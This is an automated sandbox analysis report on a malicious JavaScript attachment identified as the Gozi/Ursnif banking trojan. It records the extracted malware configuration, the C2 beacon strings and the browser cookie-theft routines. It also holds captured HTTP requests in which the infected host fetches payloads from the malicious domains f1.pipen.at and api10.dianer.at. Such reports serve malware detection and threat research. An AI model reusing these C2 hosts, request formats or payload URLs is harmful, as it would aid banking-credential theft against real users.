
Analysis Report open_attach_n2k.js

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 224571
Start date: 22.04.2020
Start time: 20:17:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 40s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: open_attach_n2k.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: Without Instrumentation
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winJS@19/18@4/1
EGA Information:
  • Successful, ratio: 50%
HDC Information:
  • Successful, ratio: 5.7% (good quality ratio 5.3%)
  • Quality average: 77.6%
  • Quality standard deviation: 28.6%
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 68
  • Number of non-executed functions: 211
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, ielowutil.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 8.248.141.254, 67.26.75.254, 8.253.207.120, 67.26.137.254, 67.26.139.254, 72.247.224.69, 104.79.117.49, 152.199.19.161
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 5404 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Gozi Ursnif
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access:
  • Valid Accounts 1
  • Replication Through Removable Media
  • External Remote Services
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
  • Spearphishing Attachment
  • Spearphishing via Service
  • Supply Chain Compromise
Execution:
  • Windows Management Instrumentation 2
  • PowerShell 1
  • Scripting 12
  • Execution through API 1
  • Exploitation for Client Execution 1
  • Graphical User Interface 1
  • Command-Line Interface 12
  • Third-party Software
  • Rundll32
Persistence:
  • Valid Accounts 1
  • Port Monitors
  • Accessibility Features
  • System Firmware
  • Shortcut Modification
  • Modify Existing Service
  • Path Interception
  • Logon Scripts
  • DLL Search Order Hijacking
Privilege Escalation:
  • Valid Accounts 1
  • Access Token Manipulation 1
  • Process Injection 413
  • DLL Search Order Hijacking
  • File System Permissions Weakness
  • New Service
  • Scheduled Task
  • Process Injection
  • Service Registry Permissions Weakness
Defense Evasion:
  • Scripting 12
  • Obfuscated Files or Information 2
  • Masquerading 11
  • Valid Accounts 1
  • Virtualization/Sandbox Evasion 2
  • Access Token Manipulation 1
  • Process Injection 413
  • DLL Side-Loading 1
  • Connection Proxy 1
Credential Access:
  • Credential Dumping
  • Network Sniffing
  • Input Capture
  • Credentials in Files
  • Account Manipulation
  • Brute Force
  • Two-Factor Authentication Interception
  • Bash History
  • Input Prompt
Discovery:
  • System Time Discovery 1
  • Account Discovery 1
  • File and Directory Discovery 3
  • System Information Discovery 45
  • Virtualization/Sandbox Evasion 2
  • Process Discovery 3
  • Application Window Discovery 1
  • System Owner/User Discovery 1
  • System Network Connections Discovery
Lateral Movement:
  • Remote File Copy 3
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
  • Third-party Software
  • Pass the Hash
  • Remote Desktop Protocol
  • Windows Admin Shares
Collection:
  • Email Collection 1
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
  • Data Staged
  • Screen Capture
  • Email Collection
  • Clipboard Data
  • Automated Collection
Exfiltration:
  • Data Encrypted 1
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
  • Data Transfer Size Limits
  • Exfiltration Over Command and Control Channel
  • Exfiltration Over Alternative Protocol
  • Exfiltration Over Physical Medium
Command and Control:
  • Remote File Copy 3
  • Standard Cryptographic Protocol 1
  • Standard Non-Application Layer Protocol 3
  • Standard Application Layer Protocol 3
  • Connection Proxy 1
  • Commonly Used Port
  • Uncommonly Used Port
  • Standard Application Layer Protocol
  • Multilayer Encryption
Network Effects:
  • Eavesdrop on Insecure Network Communication
  • Exploit SS7 to Redirect Phone Calls/SMS
  • Exploit SS7 to Track Device Location
  • SIM Card Swap
  • Manipulate Device Communication
  • Jamming or Denial of Service
  • Rogue Wi-Fi Access Points
  • Downgrade to Insecure Protocols
  • Rogue Cellular Base Station
Remote Service Effects:
  • Remotely Track Device Without Authorization
  • Remotely Wipe Data Without Authorization
  • Obtain Device Cloud Backups
Impact:
  • Modify System Partition
  • Device Lockout
  • Delete Device Data
  • Premium SMS Toll Fraud
  • Manipulate App Store Rankings or Ratings
  • Abuse Accessibility Features
  • Data Encrypted for Impact
  • Generate Fraudulent Advertising Revenue
  • Data Destruction

Signature Overview



AV Detection:

Found malware configuration
Source: regsvr32.exe.3660.3.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "404", "system": "96ab1502108db75b005f32e9fdb6fa37hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587579570", "user": "b0e80f0d54c8a3b79c4b2eb5591a3ea3", "hash": "0x0d8e127a", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: f1.pipen.at | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: open_attach_n2k.js | Virustotal: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txt | Joe Sandbox ML: detected

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0506CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0507940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05068181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05077CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: regsvr32.exe, 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp | String found in binary or memory: %wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: api10.dianer.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /api1/R1NJU94g4N/wxb9_2BTUmytHmlRp/DyOC4pGYtn71/VKpppweKVls/He_2BFZ3z9GdDj/MJ0eK3qnN7oV9up_2FdGD/EhrAIP0h8_2BexLC/9_2FKO8CDYMS5Qr/srBK9D1_2FY8n6zcMJ/C_2Fr6Xw8/lky1riXRkBzWOeAcP0w0/Gp_2BvsVBDl3A7hBzed/GL8_2FQ_2BdZEhbEncOIXV/r2Sm9iD95dRNe/Fj7eH618/2vnPhwfoDqXBj8ipFJpQLng/9LFEAV_2BE/2X88IgU6xj_2BKMZ9/1_0A_0DWT5az/_2FqBxB7vZO/S2uYdjcsIn5c5k/3v_2FtjEGqD/_2FkGXFH/Sgzr HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: f1.pipen.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: f1.pipen.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/l0mTpJmtYNx_2FHoXqv/h0B17aaM7uO1kLzMTeiaKj/hMue4W18FnswJ/pFZCIyPa/_2B3qH1zExISkLPu8Yn0xPa/PMCTZ_2F4P/xXUio3WfxELMS0u7I/xZn6PsaqWInq/uXwH882hVN0/0DY76GPw9EQYhi/8xV1QI1gTC1VTtDA4nL4Q/SnXZvNTwEC44L5QG/peHFwijSOHGp5dl/nbMK6ukjZlFT0S7P7m/c2gAxLP6p/dw55hQ9BUr0XjRjWinOD/4P1NtTvMM9_0A_0D6q2/Sf1u_2B9aB8ZRp6y33P63S/CXearhDR81dZW/SpbNWD3S/ZBhBjV8CwFqFIyj4qrR15Dd/r HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: f1.pipen.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: f1.pipen.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/9_2Fi3n1f/7FGB8_2F40_2FcxXZyJn/MYPNPdyBQdg05qIr4uV/UBpeqey5L5bx_2B9XOxmum/XWCzESfD0GEF4/Qjx5aw51/G3fgrbAK8jrnIdMeRkz1f3I/vFKx_2FN1E/_2FtGaz62dC02Cddz/RaPqDvZTx_2B/awvst0R17dZ/0GfbzNl2n3qF9L/E7z046Msr_2BJT7rA_2FD/A8GGcdT9WzqgNb7z/BNY39tuIwWJYXDY/hGC0yZivJk9AmDj5Xd/CtOHNb0TO/Uk_2BZyKMemjBoc_0A_0/D4iJROIwC22J8Lo_2FC/D_2B62mE_2FFLXf4zekfTe/pVtfNYg5dNL_2/Bty160ii/60zh3n_2Byaa/vvL1S HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: f1.pipen.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: f1.pipen.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: api10.dianer.at
Found strings which match to known social media urls
Source: msapplication.xml0.6.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa232f56d,0x01d618d2</date><accdate>0xa232f56d,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.6.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa232f56d,0x01d618d2</date><accdate>0xa2357e00,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.6.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa2427468,0x01d618d2</date><accdate>0xa2427468,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.6.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa2427468,0x01d618d2</date><accdate>0xa2427468,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.6.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa244fd5d,0x01d618d2</date><accdate>0xa244fd5d,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.6.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa244fd5d,0x01d618d2</date><accdate>0xa244fd5d,0x01d618d2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 22 Apr 2020 18:19:30 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary data
Source: regsvr32.exe, control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/9_2Fi3n1f/7FGB8_2F40_2FcxXZyJn/MYPNPdyBQdg05qIr4uV/UBpeqey5L5bx_2B9XOxm
Source: regsvr32.exe, 00000003.00000003.1410030358.00000000001A2000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.1407600605.0000000000193000.00000004.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/9_2Fi3n1f/7FGB8_2F40_2FcxXZyJn/MYPNPdyBQdg05qIr4uV/UBpeqey5L5bx_2B9XOxmum/XW
Source: regsvr32.exe, 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: msapplication.xml.6.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.6.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.6.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.6.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.6.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.6.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.6.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.6.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 3_2_0507FB8F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 3_2_0507FB8F
Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72721652 NtMapViewOfSection,3_2_72721652
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7272113E GetProcAddress,NtCreateSection,memset,3_2_7272113E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72722765 NtQueryVirtualMemory,3_2_72722765
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050675B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_050675B3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05065CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_05065CD8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_0506476B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506668C NtMapViewOfSection,3_2_0506668C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,3_2_0507CEA7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05080170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_05080170
